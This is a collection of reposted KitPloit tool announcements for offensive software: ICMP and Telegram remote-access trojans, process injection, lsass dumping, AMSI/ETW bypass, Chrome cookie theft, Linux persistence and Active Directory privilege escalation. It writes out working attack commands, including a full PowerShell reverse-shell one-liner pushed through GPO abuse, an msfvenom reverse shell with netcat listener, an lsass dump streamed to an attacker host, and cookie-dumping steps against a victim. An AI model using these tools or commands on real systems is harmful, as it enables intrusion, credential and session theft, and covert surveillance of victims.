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PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

By: Zion3R β€” May 12th 2024 at 12:30

PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.


  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go


Download the binaries

or build the binaries and you are ready to go:

$ git clone
$ go build client.go
$ go build server.go



./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)


./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)

☐ β˜† βœ‡ KitPloit - PenTest Tools!

RemoteTLSCallbackInjection - Utilizing TLS Callbacks To Execute A Payload Without Spawning Any Threads In A Remote Process

By: Zion3R β€” April 10th 2024 at 12:30

This method utilizes TLS callbacks to execute aΒ payloadΒ without spawning any threads in a remote process. This method is inspired byΒ Threadless InjectionΒ as RemoteTLSCallbackInjection does not invoke any API calls to trigger the injectedΒ payload.

Quick Links

Maldev Academy Home

Maldev Academy Syllabus

Related Maldev Academy Modules

New Module 34: TLS Callbacks For Anti-Debugging

New Module 35: Threadless Injection

Implementation Steps

The PoC follows these steps:

  1. Create a suspended process using the CreateProcessViaWinAPIsW function (i.e. RuntimeBroker.exe).
  2. Fetch the remote process image base address followed by reading the process's PE headers.
  3. Fetch an address to a TLS callback function.
  4. Patch a fixed shellcode (i.e. g_FixedShellcode) with runtime-retrieved values. This shellcode is responsible for restoring both original bytes and memory permission of the TLS callback function's address.
  5. Inject both shellcodes: g_FixedShellcode and the main payload.
  6. Patch the TLS callback function's address and replace it with the address of our injected payload.
  7. Resume process.

The g_FixedShellcode shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.


The following image shows our implementation, RemoteTLSCallbackInjection.exe, spawning a cmd.exe as its main payload.

☐ β˜† βœ‡ KitPloit - PenTest Tools!

Pyradm - Python Remote Administration Tool Via Telegram

By: Zion3R β€” March 15th 2024 at 11:30

Remote administration crossplatfrom tool via telegram\ Coded with ❀️ python3 + aiogram3\


  • [X] Screenshot from target
  • [X] Crossplatform
  • [X] Upload/Download
  • [X] Fully compatible shell
  • [X] Process list
  • [X] Webcam (video record or screenshot)
  • [X] Geolocation
  • [X] Filemanager
  • [X] Microphone
  • [X] Clipboard (text, image)


/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
Press button to download file
Send any file as file for upload to target


  • git clone
  • cd pyradm
  • pip3 install -r requirements.txt
  • Put bot token to, ask @Bothfather
  • python3


  • Put bot token to
  • pip install nuitka
  • nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe


☐ β˜† βœ‡ KitPloit - PenTest Tools!

RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program

By: Zion3R β€” March 1st 2024 at 11:30

A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.

About RKS (RemoteKeyStrokes)

All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.

Help Menu
$ ./ -h
Usage: ./ (RemoteKeyStrokes)
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)

-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)

-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not

-h, --help Display this help message


Internal Reconnaissance
  • When running in command prompt
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.h -c recon_cmds.txt

Execute Implant
  • Execute an implant while reading the contents of the payload in powershell.
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1

$ ./ -c implant.ps1

$ nc -lvnp 4444

File Transfer
  • Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.
$ ./ -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1

$ ./ -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64

Specify Grapical Remote Software
  • If you're targeting VNC network protocols you can specify the window name with tightvnc.

$ ./ -i implant.ps1 -w tightvnc

  • If you're targeting legacy operating systems with older RDP authentication specify the window name with rdesktop.

$ ./ -i implant.bat -w rdesktop

TODO and Help Wanted
  • Add text colors for better user experience

  • Implement Base64 file transfer

  • Implement Bin2Hex file transfer

  • Implement a persistence function for both windows and linux.

  • Implement antiforensics function for both windows and linux.

  • Implement to read shellcode input and run C# implant and powershell runspace

  • Implement privesc function for both windows and linux



☐ β˜† βœ‡ KitPloit - PenTest Tools!

BackDoorSim - An Educational Into Remote Administration Tools

By: Zion3R β€” February 26th 2024 at 11:30

BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.

  • File Transfer: Upload and download files between server and client.
  • Screenshot Capture: Take screenshots from the client's system.
  • System Information Gathering: Retrieve detailed system and security software information.
  • Camera Access: Capture images from the client's webcam.
  • Notifications: Send and display notifications on the client system.
  • Help Menu: Easy access to command information and usage.


To set up BackdoorSim, you will need to install it on both the server and client machines.

  1. Clone the repository:

shell $ git clone

  1. Navigate to the project directory:

shell $ cd BackDoorSim

  1. Install the required dependencies:

shell $ pip install -r requirements.txt


After starting both the server and client, you can use the following commands in the server's command prompt:

  • upload [file_path]: Upload a file to the client.
  • download [file_path]: Download a file from the client.
  • screenshot: Capture a screenshot from the client.
  • sysinfo: Get system information from the client.
  • securityinfo: Get security software status from the client.
  • camshot: Capture an image from the client's webcam.
  • notify [title] [message]: Send a notification to the client.
  • help: Display the help menu.


BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

DepNot: RansomwareSim

If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool

BackdoorSim: An Educational into Remote Administration Tools

If you want to read our article about Backdoor


Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


For any inquiries or further information, you can reach me through the following channels:

☐ β˜† βœ‡ KitPloit - PenTest Tools!

pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R β€” January 17th 2024 at 11:30

Python partial implementation of SharpGPOAbuse by@pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

Default behavior adds a local administrator.

How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)

./ DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./ DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \


☐ β˜† βœ‡ KitPloit - PenTest Tools!

PPLBlade - Protected Process Dumper Tool

By: Zion3R β€” January 7th 2024 at 11:30

Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here:

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.


  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade

☐ β˜† βœ‡ KitPloit - PenTest Tools!

NimExec - Fileless Command Execution For Lateral Movement In Nim

By: Zion3R β€” December 3rd 2023 at 11:30

Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.

Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.

This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.


nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname


test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'


[+] Connected to
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                          Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

HiddenDesktop - HVNC For Cobalt Strike

By: Zion3R β€” November 29th 2023 at 11:30

Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.

There are four components of Hidden Desktop:

  1. BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.

  2. HVNC shellcode: PIC implementation of TinyNuke HVNC.

  3. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.

  4. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.


Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:


You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]



Implementation Details

  1. The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.
  2. The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.
  3. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.
  4. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.


The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

  • Windows Server 2022 x64
  • Windows Server 2016 x64
  • Windows Server 2012 R2 x64
  • Windows Server 2008 x86
  • Windows 7 SP1 x64

Known Issues

  • The start menu is not functional.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

DynastyPersist - A Linux Persistence Tool!

By: Zion3R β€” November 28th 2023 at 11:30

  • A Linux persistence tool!

  • A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.


  1. SSH Key Generation: Automatically generates SSH keys for covert access.

  2. Cronjob Persistence: Sets up cronjobs for scheduled persistence.

  3. Custom User with Root: Creates a custom user with root privileges.

  4. RCE Persistence: Achieves persistence through remote code execution.

  5. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.

  6. Bashrc Persistence: Modifies user-specific shell initialization files for persistence.

  7. Systemd Service for Root: Sets up a systemd service for achieving root persistence.

  8. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.

  9. Backdooring Message of the Day / Header: Backdoors system message display for covert access.

  10. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.


  1. Clone this repository to your local machine:

    git clone
  2. One linear

    curl -sSL | bash


For support, email or join our Discord server.

  • Discord:

Thank You!

☐ β˜† βœ‡ KitPloit - PenTest Tools!

LightsOut - Generate An Obfuscated DLL That Will Disable AMSI And ETW

By: Zion3R β€” November 19th 2023 at 11:30

LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).

LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.

Features currently include:

  • XOR encoding for strings
  • WinAPI function name randomization
  • Multiple sandbox check options
  • Hardware breakpoint bypass option
| |
| AMSI + ETW |
| |
| _______ |
| || || |
| ||_____|| |
| |/ /|| |
| / / || |
| /____/ /-' |
| |____|/ |
| |
| @icyguider |
| |
| RG|
usage: [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]

Generate an obfuscated DLL that will disable AMSI & ETW

-h, --help show this help message and exit
-m <method>, --method <method>
Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox &lt ;option>
Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
-sa <value>, --sandbox-arg <value>
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-k <key>, --key <key>
Key to encode strings with (randomly generated by default)
-o <outfile>, --outfile <outfile>
File to save DLL to

Remote options:
-p <pid>, --pid <pid>
PID of remote process to patch

Intended Use/Opsec Considerations

This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.

Usage Examples

You can transfer the output DLL to your target system and load it into powershell various ways. For example, it can be done via P/Invoke with LoadLibrary:

Or even easier, copy powershell to an arbitrary location and side load the DLL!

Greetz/Credit/Further Reference:

☐ β˜† βœ‡ KitPloit - PenTest Tools!

Chromecookiestealer - Steal/Inject Chrome Cookies Over The DevTools Protocol

By: Zion3R β€” October 8th 2023 at 11:30

Attaches to Chrome using its Remote DevTools protocol and steals/injects/clears/deletes cookies.

Heavily inspired by WhiteChocolateMacademiaNut.

Cookies are dumped as JSON objects using Chrome's own format. The same format is used for cookies to be loaded.

For legal use only.


  • Dump Chrome's cookies
  • Inject dumped Cookies into (another instance of) Chrome
  • Clear Chrome's cookies
  • Defaults settable at compile time


Steal a victim's cookies:

git clone
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json

Inject into the attacker's local browser:

# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json


Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:

- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies

Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:

name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.

Filenames may also be "-" for stdin/stdout.

-chrome URL
Chrome remote debugging URL (default "ws://")
C lear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
Don't print a summary on exit
Enable verbose logging


go build should be all that's necessary. The following may be set at compile time with -ldflags '-X main.Foo=bar' for a touch more on-target stealth.

Variable Description
DumpFile Name of a file to which to dump cookies. Implies -dump
InjectFile Name of a file from which to inject cookies. Implies -inject
DeleteFile Name of a file with parameters describing cookies to delete. Implies -delete
DoClear If set to any value, implies -clear

None of the above are set by default.

The Chrome DevTools Protocol is a bit of a moving target. It may be necessary to use a newer version of the chromedp and cdproto libraries should this program stop working. This can be done with

go get -u -v all
go mod tidy
go build

which could well have the side-effect of breaking everything else.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions

By: Zion3R β€” July 31st 2023 at 12:30

Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions


1. git clone
2. Now Follow the instructions in HOW TO USE Section.


1. Go to Telegram and search for
2. Create Bot and get the API_TOKEN
3. Now search for and get the chat_id
4. Now Go to and go to line 16 and 17 and place API_TOKEN and chat_id there
5. Now run python For Windows and python3 For Linux
6. Now Go to the bot which u created and send command in message field


HELP MENU: Coded By Machine1337
CMD Commands | Execute cmd commands directly in bot
cd .. | Change the current directory
cd foldername | Change to current folder
download filename | Download File From Target
screenshot | Capture Screenshot
info | Get System Info
location | Get Target Location


1. Execute Shell Commands in bot directly.
2. download file from client.
3. Get Client System Information.
4. Get Client Location Information.
5. Capture Screenshot
6. More features will be added


Coded By: Machine1337

☐ β˜† βœ‡ KitPloit - PenTest Tools!

BackupOperatorToolkit - The BackupOperatorToolkit Contains Different Techniques Allowing You To Escalate From Backup Operator To Domain Admin

By: Zion3R β€” June 16th 2023 at 12:30

The BackupOperatorToolkit contains different techniques allowing you to escalate from Backup Operator to Domain Admin.


The BackupOperatorToolkit (BOT) has 4 different mode that allows you to escalate from Backup Operator to Domain Admin.
Use "runas.exe /netonly /\backupoperator powershell.exe" before running the tool.

Service Mode

The SERVICE mode creates a service on the remote host that will be executed when the host is rebooted.
The service is created by modyfing the remote registry. This is possible by passing the "REG_OPTION_BACKUP_RESTORE" value to RegOpenKeyExA and RegSetValueExA.
It is not possible to have the service executed immediately as the service control manager database "SERVICES_ACTIVE_DATABASE" is loaded into memory at boot and can only be modified with local administrator privileges, which the Backup Operator does not have.



The DSRM mode will set the DsrmAdminLogonBehavior registry key found in "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" to either 0, 1, or 2.
Setting the value to 0 will only allow the DSRM account to be used when in recovery mode.
Setting the value to 1 will allow the DSRM account to be used when the Directory Services service is stopped and the NTDS is unlocked.
Setting the value to 2 will allow the DSRM account to be used with network authentication such as WinRM.
If the DUMP mode has been used and the DSRM account has been cracked offline, set the value to 2 and log into the Domain Controller with the DSRM account which will be local administrator.

.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2


The DUMP mode will dump the SAM, SYSTEM, and SECURITY hives to a local path on the remote host or upload the files to a network share.
Once the hives have been dumped you could PtH with the Domain Controller hash, crack DSRM and enable network auth, or possibly authenticate with another account found in the dumps. Accounts from other forests may be stored in these files, I'm not sure why but this has been observed on engagements with management forests. This mode is inspired by the BackupOperatorToDA project.

.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK


The IFEO (Image File Execution Options) will enable you to run an application when a specifc process is terminated.
This could grant a shell before the SERVICE mode will in case the target host is heavily utilized and rarely rebooted.
The executable will be running as a child to the WerFault.exe process.

.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK
